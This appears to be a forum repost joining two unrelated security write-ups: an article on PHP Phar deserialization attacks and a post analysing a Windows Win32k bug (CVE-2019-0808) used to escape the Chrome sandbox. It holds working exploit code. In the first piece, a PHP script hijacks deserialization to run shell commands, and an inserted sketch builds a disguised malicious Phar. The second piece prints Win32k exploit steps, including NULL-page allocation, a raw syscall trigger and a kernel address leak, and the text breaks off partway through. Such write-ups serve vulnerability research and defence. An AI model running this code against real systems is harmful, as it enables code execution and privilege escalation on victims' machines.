Phar deserialization is a relatively new vector for performing code reuse attacks on object-oriented PHP applications and it was publicly disclosed at Black Hat 2018 by security researcher Sam Thomas. Similar to ROP (return-oriented programming) attacks on compiled binaries, this type of exploitation is carried through PHP object injection (POI), a form of property-oriented programming (POP) in the context of object-oriented PHP code. Due to its novelty, this kind of attack vector gained increased attention from the security community in the past few months, leading to the discovery of remote code execution vulnerabilities in many widely deployed platforms, such as:

Wordpress < 5.0.1 (CVE-2018-20148)
Drupal 8.6.x, 8.5.x, 7.x (CVE-2019-6339)
Prestashop 1.6.x, 1.7.x (CVE-2018-19126)
TCPDF < 6.2.19 (CVE-2018-17057)
PhpBB 3.2.3 (CVE-2018-19274)

Throughout this series, we aim to describe Phar deserialization’s inner workings, with a hands-on approach to exploiting CVE-2018-19274, a remote code execution vulnerability in PhpBB 3.2.3.

ON PHAR FILES, DESERIALIZATION, AND PHP WRAPPERS

To better understand how this vector works, we need a bit of a context regarding what Phar files are, how deserialization attacks work, what a PHP wrapper is, and how the three concepts interrelate.

What is a Phar File?

Phar (PHp ARchive) files are a means to distribute PHP applications and libraries by using a single file format (similar to how JAR files work in the Java ecosystem). These Phar files can also be included directly in your own PHP code.
Structurally, they're simply archives (tar files with optional gzip compression, or zip-based ones) with specific parts described by the PHP manual as follows:

A stub: a PHP code sequence acting as a bootstrapper when the Phar is run as a standalone application; at a minimum, it must contain the following code: <?php __HALT_COMPILER();
A manifest describing the source files included in the archive; optionally, it holds serialized metadata (this serialized chunk is a critical link in the exploitation chain, as we will see further on)
The source files (the actual Phar functionality)
An optional signature, used for integrity checks

Understanding deserialization vulnerabilities

Serialization is the process of storing an object's properties in a binary format, which allows the object to be passed around or stored on disk, so it can be unserialized and used at a later time. In PHP, the serialization process saves an object's properties and its class name, but not its methods (hence the POP acronym). This proves to be a smart design choice from a security perspective, except for one particularity that makes the deserialization process dangerous: the so-called magic methods. These functions are specific to every PHP class, have a double-underscore-prefixed name, and get implicitly called on certain runtime events. By default, most of them do nothing, and it is the developer's job to define their behavior.
In our case, the following two are worth mentioning, since they're the only ones that get triggered on Phar deserialization:

__wakeup() – called implicitly upon an object's deserialization
__destruct() – called implicitly when an object is no longer used in the code and gets destroyed by the garbage collector

Let's look at how a snippet of vulnerable code is exploited using this vector in the following dummy example:

# file: dummy_class.php
<?php
/* Let's suppose some serialized data is written to the disk with loose
   file permissions and gets read at a later time */
class Data {
    # Some default data
    public $data = array("theme"=>"light", "font"=>12);
    public $wake_func = "print_r";
    public $wake_args = "The data has been read!\n";

    # magic method that is called on deserialization
    public function __wakeup() {
        call_user_func($this->wake_func, $this->wake_args);
    }
}

# Acting as main: the conditional below gets executed only when the file is called directly
if (basename($argv[0]) == basename(__FILE__)) {
    # Serialize the object and dump it to the disk; also free memory
    $data_obj = new Data();
    $fpath = "/tmp/777_file";
    file_put_contents($fpath, serialize($data_obj));
    echo "The data has been written.\n";
    unset($data_obj);

    # Wait for 60 seconds, then retrieve it
    echo "(sleeping for 60 seconds…)\n";
    sleep(60);
    $new_obj = unserialize(file_get_contents($fpath));
}

We notice that, upon deserialization, the __wakeup() method dynamically calls the print_r function pointed to by the object's $wake_func and $wake_args properties. A simple run yields the following output:

$ php dummy_class.php
The data has been written.
(sleeping for 60 seconds…)
The data has been read!

But what if, in the 60-second timespan, we manage to replace the serialized data with our own to get control of the function called upon deserialization?
The following code shows how to accomplish this:

# file: exploit.php
<?php
require('dummy_class.php');

# Using the existing class definition, we create a crafted object and overwrite the
# existing serialized data with our own
$bad_obj = new Data();
$bad_obj->wake_func = "passthru";
$bad_obj->wake_args = "id";
$fpath = "/tmp/777_file";
file_put_contents($fpath, serialize($bad_obj));

Running the above snippet in the 60-second timespan, while dummy_class.php is waiting, grants us code execution, even though the source of dummy_class.php hasn't changed. The behavior results from the serialized object's dynamic function call, changed through the object's properties to passthru("id").

$ php dummy_class.php
The data has been written.
(sleeping for 60 seconds…)
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)

In the context of PHP object injection (POI/deserialization) attacks, these vulnerable sequences of code go by the name of gadgets or POP chains.

PHP Wrappers – Wrapping it Together

According to the PHP documentation, streams are a way of generalizing file, network, data compression, and other operations that share a common set of functions and uses. PHP wrappers take on the daunting task of handling various protocols and provide a stream interface to the protocol's data. These streams are usually consumed by filesystem functions such as fopen(), copy(), and filesize(). A stream is accessed using a URL-like syntax: wrapper://source. The most common stream interfaces provided by PHP are:

file:// - Accessing the local filesystem
http:// - Accessing HTTP(S) URLs
ftp:// - Accessing FTP(S) URLs
php:// - Accessing various I/O streams

The stream type of interest to us is (*drum roll*) the phar:// wrapper.
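Stepping back to the payload for a moment, it helps to see the exact bytes exploit.php writes to /tmp/777_file. The standalone sketch below is not part of the original article; it re-declares the Data class from dummy_class.php so it can run on its own and print the crafted object's serialized form.

```php
<?php
// Standalone sketch: print the serialized form of the crafted object
// that exploit.php writes to disk. Mirrors the Data class above.
class Data {
    public $data = array("theme" => "light", "font" => 12);
    public $wake_func = "print_r";
    public $wake_args = "The data has been read!\n";
    public function __wakeup() {
        call_user_func($this->wake_func, $this->wake_args);
    }
}

$bad_obj = new Data();
$bad_obj->wake_func = "passthru";
$bad_obj->wake_args = "id";
echo serialize($bad_obj), "\n";
// Prints one line: the class name with its length and the property count,
// followed by each property name/value pair. It begins with O:4:"Data":3:{
// and contains s:9:"wake_func";s:8:"passthru"; and s:2:"id";
```

Note that only property names and values appear in the output; __wakeup() itself is never serialized, which is exactly why a vulnerable class definition must already exist on the target for the gadget to fire.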
A typical declaration has the form phar://full/or/relative/path and has two interesting properties:

The file extension is not checked when declaring a stream, making Phar files prime polyglot candidates
If a filesystem function is called with a phar:// stream as an argument, the Phar's serialized metadata automatically gets unserialized, by design

Here is a list of filesystem functions that trigger Phar deserialization: copy, file_exists, file_get_contents, file_put_contents, file, fileatime, filectime, filegroup, fileinode, filemtime, fileowner, fileperms, filesize, filetype, fopen, is_dir, is_executable, is_file, is_link, is_readable, is_writable, lstat, mkdir, parse_ini_file, readfile, rename, rmdir, stat, touch, unlink.

How to Carry Out a Phar Deserialization Attack

At this point, we have all the ingredients of a recipe for exploitation. The required conditions for exploiting a Phar deserialization vulnerability usually consist of:

The presence of a gadget/POP chain in the application's source code (including third-party libraries), which allows for POI exploitation; most of the time, these are discovered by source code inspection
The ability to include a local or remote malicious Phar file (most commonly by file upload, relying on polyglots)
An entry point where a filesystem function gets called on a user-controlled phar:// wrapper, also discovered by source code inspection

For example, think of a poorly sanitized input field for setting a profile picture via a URL. The attacker sets the value of the input to the previously uploaded Phar/polyglot rather than an http:// address (say, phar://../uploads/phar_polyglot.jpg); on the server side, the backend performs a filesystem call on the provided wrapper, such as verifying that the file exists on disk by calling file_exists("phar://../uploads/phar_polyglot.jpg"). At this very moment, the uploaded Phar's metadata is unserialized, taking advantage of the gadgets/POP chains to complete the exploitation chain.
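Putting the pieces together, the entire chain (gadget class, malicious Phar with crafted metadata, misleading extension, and a file_exists() trigger) can be sketched in one self-contained script. This illustration builds on the dummy Data gadget from earlier and is not code from the article; it assumes phar.readonly=0, uses illustrative paths, and the automatic metadata unserialization on phar:// access only applies to PHP versions before 8.0.

```php
<?php
// End-to-end Phar deserialization sketch using the dummy Data gadget.
// Run with: php -d phar.readonly=0 phar_chain.php
if (ini_get('phar.readonly')) {
    exit("Re-run with: php -d phar.readonly=0 phar_chain.php\n");
}

class Data {
    public $wake_func = "print_r";
    public $wake_args = "default\n";
    public function __wakeup() {
        call_user_func($this->wake_func, $this->wake_args);
    }
}

// Attacker side: craft a Phar whose metadata is a malicious Data object.
@unlink('/tmp/evil.phar');
@unlink('/tmp/evil.jpg');
$phar = new Phar('/tmp/evil.phar');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->addFromString('x.txt', 'x');
$bad = new Data();
$bad->wake_func = "passthru";
$bad->wake_args = "id";
$phar->setMetadata($bad);   // serialize() happens here; __wakeup() does not fire yet
unset($phar);

// The phar:// wrapper ignores the extension, so a .jpg disguise works.
rename('/tmp/evil.phar', '/tmp/evil.jpg');

// Victim side: a harmless-looking filesystem check on a user-controlled
// path unserializes the metadata and fires Data::__wakeup().
file_exists('phar:///tmp/evil.jpg/x.txt');   // runs passthru("id") on PHP < 8.0
```

On PHP 8.0 and later the metadata is only unserialized on an explicit getMetadata() call, which is why this attack class was effectively neutralized there.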
Look for part two of this blog series, where we'll see how all of these concepts apply by getting our hands dirty and exploiting a remote code execution vulnerability in PhpBB 3.2.3 (CVE-2018-19274). Sursa: https://www.ixiacom.com/company/blog/exploiting-php-phar-deserialization-vulnerabilities-part-1
-
Posted by Exodus Intel VRT on May 17, 2019

Windows Within Windows – Escaping The Chrome Sandbox With a Win32k NDay

Author: Grant Willcox

This post explores a recently patched Win32k vulnerability (CVE-2019-0808) that was used in the wild with CVE-2019-5786 to provide a full Google Chrome sandbox escape chain.

Overview

On March 7th 2019, Google came out with a blog post discussing two vulnerabilities that were being chained together in the wild to remotely exploit Chrome users running Windows 7 x86: CVE-2019-5786, a bug in the Chrome renderer that has been detailed in our blog post, and CVE-2019-0808, a NULL pointer dereference bug in win32k.sys affecting Windows 7 and Windows Server 2008 which allowed attackers to escape the Chrome sandbox and execute arbitrary code as the SYSTEM user.

Since Google's blog post, one crash PoC for Windows 7 x86 has been posted to GitHub by ze0r, which results in a BSOD. This blog details a working sandbox escape and a demonstration of the full exploit chain in action, which utilizes these two bugs to illustrate the APT attack encountered by Google in the wild.

Analysis of the Public PoC

To provide appropriate context for the rest of this blog, we will first start with an analysis of the public PoC code. The first operation conducted within the PoC code is the creation of two modeless drag-and-drop popup menus, hMenuRoot and hMenuSub. hMenuRoot is then set up as the primary drop-down menu, and hMenuSub is configured as its submenu.

HMENU hMenuRoot = CreatePopupMenu();
HMENU hMenuSub = CreatePopupMenu();
...
MENUINFO mi = { 0 };
mi.cbSize = sizeof(MENUINFO);
mi.fMask = MIM_STYLE;
mi.dwStyle = MNS_MODELESS | MNS_DRAGDROP;
SetMenuInfo(hMenuRoot, &mi);
SetMenuInfo(hMenuSub, &mi);
AppendMenuA(hMenuRoot, MF_BYPOSITION | MF_POPUP, (UINT_PTR)hMenuSub, "Root");
AppendMenuA(hMenuSub, MF_BYPOSITION | MF_POPUP, 0, "Sub");

Following this, a WH_CALLWNDPROC hook is installed on the current thread using SetWindowsHookEx(). This hook ensures that WindowHookProc() is executed prior to a window procedure being executed. Once this is done, SetWinEventHook() is called to set an event hook which ensures that DisplayEventProc() is called when a popup menu is displayed.

SetWindowsHookEx(WH_CALLWNDPROC, (HOOKPROC)WindowHookProc, hInst, GetCurrentThreadId());
SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, hInst, DisplayEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0);

The following diagram shows the window message call flow before and after setting the WH_CALLWNDPROC hook.

Window message call flow before and after setting the WH_CALLWNDPROC hook

Once the hooks have been installed, the hWndFakeMenu window is created using CreateWindowA() with the class string "#32768", which, according to MSDN, is the system-reserved string for the menu class. Creating a window in this manner causes CreateWindowA() to set many data fields within the window object to 0 or NULL, as CreateWindowA() does not know how to fill them in appropriately. One of these fields, which is of importance to this exploit, is the spMenu field, which will be set to NULL.

hWndFakeMenu = CreateWindowA("#32768", "MN", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);

hWndMain is then created using CreateWindowA() with the window class wndClass. This sets hWndMain's window procedure to DefWindowProc(), a Windows API function responsible for handling any window messages not handled by the window itself.
The parameters for CreateWindowA() also ensure that hWndMain is created in disabled mode so that it will not receive any keyboard or mouse input from the end user, but can still receive other window messages from other windows, the system, or the application itself. This is a preventative measure to ensure the user doesn't accidentally interact with the window in an adverse manner, such as repositioning it to an unexpected location. Finally, the last parameters to CreateWindowA() ensure that the window is positioned at (0, 0) and is 1 pixel by 1 pixel in size. This can be seen in the code below.

WNDCLASSEXA wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXA);
wndClass.lpfnWndProc = DefWindowProc;
wndClass.cbClsExtra = 0;
wndClass.cbWndExtra = 0;
wndClass.hInstance = hInst;
wndClass.lpszMenuName = 0;
wndClass.lpszClassName = "WNDCLASSMAIN";
RegisterClassExA(&wndClass);
hWndMain = CreateWindowA("WNDCLASSMAIN", "CVE", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);
TrackPopupMenuEx(hMenuRoot, 0, 0, 0, hWndMain, NULL);

MSG msg = { 0 };
while (GetMessageW(&msg, NULL, 0, 0)) {
    TranslateMessage(&msg);
    DispatchMessageW(&msg);
    if (iMenuCreated >= 1) {
        bOnDraging = TRUE;
        callNtUserMNDragOverSysCall(&pt, buf);
        break;
    }
}

After the hWndMain window is created, TrackPopupMenuEx() is called to display hMenuRoot. This results in a window message being placed on hWndMain's message queue, which is retrieved in main()'s message loop via GetMessageW(), translated via TranslateMessage(), and subsequently sent to hWndMain's window procedure via DispatchMessageW(). This results in the window procedure hook being executed, which calls WindowHookProc().

BOOL bOnDraging = FALSE;
....
LRESULT CALLBACK WindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
    tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
    if (!bOnDraging) {
        return CallNextHookEx(0, code, wParam, lParam);
    }
....
As the bOnDraging variable is not yet set, WindowHookProc() simply calls CallNextHookEx() to invoke the next available hook. The creation of the popup menu then causes an EVENT_SYSTEM_MENUPOPUPSTART event to be sent. This event message is caught by the event hook and diverts execution to the function DisplayEventProc().

UINT iMenuCreated = 0;
VOID CALLBACK DisplayEventProc(HWINEVENTHOOK hWinEventHook, DWORD event, HWND hwnd, LONG idObject, LONG idChild, DWORD idEventThread, DWORD dwmsEventTime)
{
    switch (iMenuCreated) {
    case 0:
        SendMessageW(hwnd, WM_LBUTTONDOWN, 0, 0x00050005);
        break;
    case 1:
        SendMessageW(hwnd, WM_MOUSEMOVE, 0, 0x00060006);
        break;
    }
    printf("[*] MSG\n");
    iMenuCreated++;
}

Since this is the first time DisplayEventProc() is executed, iMenuCreated is 0, so case 0 runs. This case sends the WM_LBUTTONDOWN window message to hWndMain using SendMessageW() in order to select the hMenuRoot menu at point (0x5, 0x5). Once this message has been placed onto hWndMain's window message queue, iMenuCreated is incremented.

hWndMain then processes the WM_LBUTTONDOWN message and selects hMenuRoot, which results in hMenuSub being displayed. This triggers a second EVENT_SYSTEM_MENUPOPUPSTART event, so DisplayEventProc() is executed again. This time around the second case is executed, as iMenuCreated is now 1. This case uses SendMessageW() to move the mouse to point (0x6, 0x6) on the user's desktop. Since the left mouse button is still down, this makes it appear as though a drag-and-drop operation is being performed. Following this, iMenuCreated is incremented once again and execution returns to the message loop inside main().

CHAR buf[0x100] = { 0 };
POINT pt;
pt.x = 2;
pt.y = 2;
...
if (iMenuCreated >= 1) {
    bOnDraging = TRUE;
    callNtUserMNDragOverSysCall(&pt, buf);
    break;
}

Since iMenuCreated now holds a value of 2, the code inside the if statement executes, setting bOnDraging to TRUE to indicate the drag operation was conducted with the mouse, after which a call is made to callNtUserMNDragOverSysCall() with the address of the POINT structure pt and the 0x100-byte output buffer buf.

callNtUserMNDragOverSysCall() is a wrapper function which makes a syscall to NtUserMNDragOver() in win32k.sys using the syscall number 0x11ED, the syscall number for NtUserMNDragOver() on Windows 7 and Windows 7 SP1. Syscalls are used in favor of the PoC's method of obtaining the address of NtUserMNDragOver() from user32.dll, since syscall numbers tend to change only across OS versions and service packs (a notable exception being Windows 10, which undergoes more frequent changes), whereas the offsets between the exported functions in user32.dll and the unexported NtUserMNDragOver() function can change any time user32.dll is updated.

void callNtUserMNDragOverSysCall(LPVOID address1, LPVOID address2)
{
    _asm {
        mov eax, 0x11ED
        push address2
        push address1
        mov edx, esp
        int 0x2E
        pop eax
        pop eax
    }
}

NtUserMNDragOver() ends up calling xxxMNFindWindowFromPoint(), which executes xxxSendMessage() to issue a usermode callback of type WM_MN_FINDMENUWINDOWFROMPOINT. The value returned from the usermode callback is then checked using HMValidateHandle() to ensure it is a handle to a window object.

LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
    ....
    v6 = xxxSendMessage(
        var_pPopupMenu->spwndNextPopup,
        MN_FINDMENUWINDOWFROMPOINT,
        (WPARAM)&pPopupMenu,
        (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16));
        // Make the MN_FINDMENUWINDOWFROMPOINT usermode callback
        // using the address of pPopupMenu as the wParam argument.
    ThreadUnlock1();
    if ( IsMFMWFPWindow(v6) )   // Validate that the handle returned from the usermode
                                // callback is a handle to a MFMWFP window.
        v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW);
                                // Validate that the returned handle is a handle to
                                // a window object. Set v1 to TRUE if all is good.
    ...

When the callback is performed, the window procedure hook function, WindowHookProc(), is executed before the intended window procedure. This function checks what type of window message was received. If the incoming window message is a WM_MN_FINDMENUWINDOWFROMPOINT message, the following code is executed.

if ((cwp->message == WM_MN_FINDMENUWINDOWFROMPOINT)) {
    bIsDefWndProc = FALSE;
    printf("[*] HWND: %p \n", cwp->hwnd);
    SetWindowLongPtr(cwp->hwnd, GWLP_WNDPROC, (ULONG64)SubMenuProc);
}
return CallNextHookEx(0, code, wParam, lParam);

This code changes the window procedure for hWndMain from DefWindowProc() to SubMenuProc(). It also sets bIsDefWndProc to FALSE to indicate that the window procedure for hWndMain is no longer DefWindowProc().

Once the hook exits, hWndMain's window procedure is executed. However, since the window procedure for the hWndMain window was changed to SubMenuProc(), SubMenuProc() is executed instead of the expected DefWindowProc() function. SubMenuProc() first checks whether the incoming message is of type WM_MN_FINDMENUWINDOWFROMPOINT. If it is, SubMenuProc() calls SetWindowLongPtr() to set the window procedure for hWndMain back to DefWindowProc() so that hWndMain can handle any additional incoming window messages. This prevents the application from becoming unresponsive. SubMenuProc() then returns hWndFakeMenu, the handle to the window that was created using the menu class string.
LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
    if (msg == WM_MN_FINDMENUWINDOWFROMPOINT) {
        SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);
        return (ULONG)hWndFakeMenu;
    }
    return DefWindowProc(hwnd, msg, wParam, lParam);
}

Since hWndFakeMenu is a valid window handle, it passes the HMValidateHandle() check. However, as mentioned previously, many of the window's fields are set to 0 or NULL, as CreateWindowA() tried to create a window as a menu without sufficient information. Execution subsequently proceeds from xxxMNFindWindowFromPoint() to xxxMNUpdateDraggingInfo(), which calls MNGetpItem(), which in turn calls MNGetpItemFromIndex(). MNGetpItemFromIndex() then tries to access offsets within hWndFakeMenu's spMenu field. Since hWndFakeMenu's spMenu field is NULL, this results in a NULL pointer dereference, and a kernel crash if the NULL page has not been allocated.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
    tagITEM *result;    // eax
    if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems )   // NULL pointer dereference occurs
                                                              // here if spMenu is NULL.
        result = 0;
    else
        result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
    return result;
}

Sandbox Limitations

To better understand how to escape Chrome's sandbox, it is important to understand how it operates. Most of the important details of the Chrome sandbox are explained on Google's Sandbox page. Reading this page reveals several important details about the Chrome sandbox which are relevant to this exploit. These are listed below:

All processes in the Chrome sandbox run at Low integrity.
A restrictive job object is applied to the process token of all the processes running in the Chrome sandbox. This prevents the spawning of child processes, amongst other things.
Processes running in the Chrome sandbox run on an isolated desktop, separate from the main desktop and the service desktop, to prevent Shatter attacks that could result in privilege escalation.
On Windows 8 and higher, the Chrome sandbox prevents calls to win32k.sys.

The first protection in this list is that processes running inside the sandbox run with Low integrity. Running at Low integrity prevents attackers from exploiting a number of kernel leaks mentioned on sam-b's kernel leak page, as starting with Windows 8.1, most of these leaks require the process to be running with Medium integrity or higher. This limitation is bypassed in the exploit by abusing a well-known memory leak in the implementation of HMValidateHandle() on Windows versions prior to Windows 10 RS4, discussed in more detail later in the blog.

The next limitation is the restricted job object and token placed on the sandboxed process. The restricted token ensures that the sandboxed process runs without any permissions, whilst the job object ensures that the sandboxed process cannot spawn any child processes. The combination of these two mitigations means that to escape the sandbox the attacker will likely have to create their own process token or steal another process' token, and then subsequently disassociate the job object from that token. Given the permissions this requires, this most likely requires a kernel-level vulnerability. These two mitigations are the most relevant to the exploit; their bypasses are discussed in more detail later on in this blog.

The job object additionally ensures that the sandboxed process uses what Google calls the "alternate desktop" (known in Windows terminology as the "limited desktop"), a desktop separate from the main user desktop and the service desktop, to prevent potential privilege escalations via window messages.
This is done because Windows prevents window messages from being sent between desktops, which restricts the attacker to sending window messages only to windows created within the sandbox itself. Thankfully, this particular exploit only requires interaction with windows created within the sandbox, so this mitigation only really means that the end user can't see any of the windows and menus the exploit creates.

Finally, it's worth noting that whilst protections were introduced in Windows 8 to allow Chrome to prevent sandboxed applications from making syscalls to win32k.sys, these controls were not backported to Windows 7. As a result, Chrome's sandbox cannot prevent calls to win32k.sys on Windows 7 and earlier, which means that attackers can abuse vulnerabilities within win32k.sys to escape the Chrome sandbox on these versions of Windows.

Sandbox Exploit Explanation

Creating a DLL for the Chrome Sandbox

As explained in James Forshaw's In-Console-Able blog post, it is not possible to inject just any DLL into the Chrome sandbox. Due to sandbox limitations, the DLL has to be created in such a way that it does not load any other libraries or manifest files. To achieve this, the Visual Studio project for the PoC exploit was first adjusted so that the project type would be set to a DLL instead of an EXE. After this, the C++ compiler settings were changed to use the statically linked multi-threaded runtime library (not the multi-threaded DLL runtime). Finally, the linker settings were changed to instruct Visual Studio not to generate manifest files. Once this was done, Visual Studio was able to produce DLLs that could be loaded into the Chrome sandbox via a vulnerability such as István Kurucsai's 1Day Chrome vulnerability, CVE-2019-5786 (which was detailed in a previous blog post), or via DLL injection with a program such as this one.
Explanation of the Existing Limited Write Primitive

Before diving into the details of how the exploit was converted into a sandbox escape, it is important to understand the limited write primitive that this exploit grants an attacker should they successfully set up the NULL page, as this provides the basis for the discussion throughout the following sections.

Once the vulnerability has been triggered, xxxMNUpdateDraggingInfo() is called in win32k.sys. If the NULL page has been set up correctly, then xxxMNUpdateDraggingInfo() calls xxxMNSetGapState(), whose code is shown below:

void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
    ...
    var_PITEM = MNGetpItem(var_POPUPMENU, uIndex);   // Get the address where the first write
                                                     // operation should occur, minus an
                                                     // offset of 0x4.
    temp_var_PITEM = var_PITEM;
    if ( var_PITEM )
    {
        ...
        var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1);
                                  // Get the address where the second write operation
                                  // should occur, minus an offset of 0x4. This
                                  // address will be 0x6C bytes earlier in
                                  // memory than the address in var_PITEM.
        if ( fSet )
        {
            *((_DWORD *)temp_var_PITEM + 1) |= 0x80000000;   // Conduct the first write to the
                                                             // attacker-controlled address.
            if ( var_PITEM_Minus_Offset_Of_0x6C )
            {
                *((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u;
                                  // Conduct the second write to the attacker-controlled
                                  // address minus 0x68 (0x6C - 0x4).
    ...

xxxMNSetGapState() performs two write operations to an attacker-controlled location plus an offset of 4. The only difference between the two write operations is that 0x40000000 is written to an address located 0x6C bytes earlier than the address where the 0x80000000 write is conducted. It is also important to note that the writes are conducted using OR operations. This means the attacker can only add bits to the DWORD they choose to write to; it is not possible to remove or alter bits that are already there.
It is also important to note that even if an attacker starts their write at some offset, they will still only be able to write the value \x40 or \x80 to an address at best. From these observations it becomes apparent that the attacker requires a more powerful write primitive to escape the Chrome sandbox. To meet this requirement, Exodus Intelligence's exploit uses the limited write primitive to create a more powerful write primitive by abusing tagWND objects. How this is done, along with the steps required to escape the sandbox, is explained in more detail in the following sections.

Allocating the NULL Page

On Windows versions prior to Windows 8, it is possible to allocate memory in the NULL page from userland by calling NtAllocateVirtualMemory(). Within the PoC code, the main() function was adjusted to obtain the address of NtAllocateVirtualMemory() from ntdll.dll and save it into the variable pfnNtAllocateVirtualMemory. Once this is done, allocateNullPage() is called to allocate the NULL page itself, using address 0x1, with read, write, and execute permissions. The address 0x1 is then rounded down to 0x0 by NtAllocateVirtualMemory() to fit on a page boundary, thereby allowing the attacker to allocate memory at 0x0.

typedef NTSTATUS(WINAPI *NTAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG ZeroBits,
    PULONG AllocationSize,
    ULONG AllocationType,
    ULONG Protect
);
NTAllocateVirtualMemory pfnNtAllocateVirtualMemory = 0;
....
pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
....
// Thanks to https://github.com/YeonExp/HEVD/blob/c19ad75ceab65cff07233a72e2e765be866fd636/NullPointerDereference/NullPointerDereference/main.cpp#L56 for
// explaining this in an example along with the finer details that are often forgotten.
bool allocateNullPage() {
    /* Set the base address at which the memory will be allocated to 0x1.
    This is done since a value of 0x0 will not be accepted by NtAllocateVirtualMemory,
    however due to page alignment requirements the 0x1 will be rounded down to 0x0 internally. */
    PVOID BaseAddress = (PVOID)0x1;

    /* Set the size to be allocated to 40960 to ensure that there is plenty of memory
    allocated and available for use. */
    SIZE_T size = 40960;

    /* Call NtAllocateVirtualMemory to allocate the virtual memory at address 0x0 with the
    size specified in the variable size. Also make sure the memory is allocated with read,
    write, and execute permissions. */
    NTSTATUS result = pfnNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0x0, &size,
        MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);

    // If the call to NtAllocateVirtualMemory failed, return FALSE.
    if (result != 0x0) {
        return FALSE;
    }

    // If the code reaches this point, then everything went well, so return TRUE.
    return TRUE;
}

Finding the Address of HMValidateHandle

Once the NULL page has been allocated, the exploit obtains the address of the HMValidateHandle() function. HMValidateHandle() is useful to attackers as it allows them to obtain a usermode copy of any object, provided that they have a handle to it. Additionally, this leak works at Low integrity on Windows versions prior to Windows 10 RS4. By abusing this functionality to copy objects which contain a pointer to their location in kernel memory, such as tagWND (the window object), into usermode memory, an attacker can leak the addresses of various objects simply by obtaining a handle to them.

As the address of HMValidateHandle() is not exported from user32.dll, an attacker cannot obtain it directly via user32.dll's export table. Instead, the attacker must find another function that user32.dll exports which calls HMValidateHandle(), read the relative offset from that call instruction, and then perform some math to calculate the true address of HMValidateHandle().
This is done by obtaining the address of the exported function IsMenu() from user32.dll and then searching for the first instance of the byte \xE8 within IsMenu()'s code, which marks the start of a relative call to HMValidateHandle(). By then performing some math on the base address of user32.dll, the relative offset in the call instruction, and the offset of IsMenu() from the start of user32.dll, the attacker can obtain the address of HMValidateHandle(). This can be seen in the following code.

HMODULE hUser32 = LoadLibraryW(L"user32.dll");
LoadLibraryW(L"gdi32.dll");

// Find the address of HMValidateHandle using the address of user32.dll
if (findHMValidateHandleAddress(hUser32) == FALSE) {
    printf("[!] Couldn't locate the address of HMValidateHandle!\r\n");
    ExitProcess(-1);
}
...
BOOL findHMValidateHandleAddress(HMODULE hUser32)
{
    // The address of the function HMValidateHandle() is not exported to
    // the public. However the function IsMenu() contains a call to HMValidateHandle()
    // within it after some short setup code. The call instruction starts with the byte \xE8.

    // Obtain the address of the function IsMenu() from user32.dll.
    BYTE * pIsMenuFunction = (BYTE *)GetProcAddress(hUser32, "IsMenu");
    if (pIsMenuFunction == NULL) {
        printf("[!] Failed to find the address of IsMenu within user32.dll.\r\n");
        return FALSE;
    }
    else {
        printf("[*] pIsMenuFunction: 0x%08X\r\n", pIsMenuFunction);
    }

    // Search for the location of the \xE8 byte within the IsMenu() function
    // to find the start of the relative call to HMValidateHandle().
    unsigned int offsetInIsMenuFunction = 0;
    BOOL foundHMValidateHandleAddress = FALSE;
    for (unsigned int i = 0; i < 0x1000; i++) {
        BYTE* pCurrentByte = pIsMenuFunction + i;
        if (*pCurrentByte == 0xE8) {
            offsetInIsMenuFunction = i + 1;
            break;
        }
    }

    // Throw an error and exit if the \xE8 byte couldn't be located.
    if (offsetInIsMenuFunction == 0) {
        printf("[!] 
Couldn't find offset to HMValidateHandle within IsMenu.\r\n");
        return FALSE;
    }

    // Output the address of user32.dll in memory for debugging purposes.
    printf("[*] hUser32: 0x%08X\r\n", hUser32);

    // Get the value of the relative address being called within the IsMenu() function.
    unsigned int relativeAddressBeingCalledInIsMenu = *(unsigned int *)(pIsMenuFunction + offsetInIsMenuFunction);
    printf("[*] relativeAddressBeingCalledInIsMenu: 0x%08X\r\n", relativeAddressBeingCalledInIsMenu);

    // Find out how far the IsMenu() function is located from the base address of user32.dll.
    unsigned int addressOfIsMenuFromStartOfUser32 = ((unsigned int)pIsMenuFunction - (unsigned int)hUser32);
    printf("[*] addressOfIsMenuFromStartOfUser32: 0x%08X\r\n", addressOfIsMenuFromStartOfUser32);

    // Take this offset and add to it the relative address used in the call to HMValidateHandle().
    // The result should be the offset of HMValidateHandle() from the start of user32.dll.
    unsigned int offset = addressOfIsMenuFromStartOfUser32 + relativeAddressBeingCalledInIsMenu;
    printf("[*] offset: 0x%08X\r\n", offset);

    // Skip over 11 bytes since on Windows 10 these are not NOPs and it would be
    // ideal if this code could be reused in the future.
    pHmValidateHandle = (lHMValidateHandle)((unsigned int)hUser32 + offset + 11);
    printf("[*] pHmValidateHandle: 0x%08X\r\n", pHmValidateHandle);
    return TRUE;
}

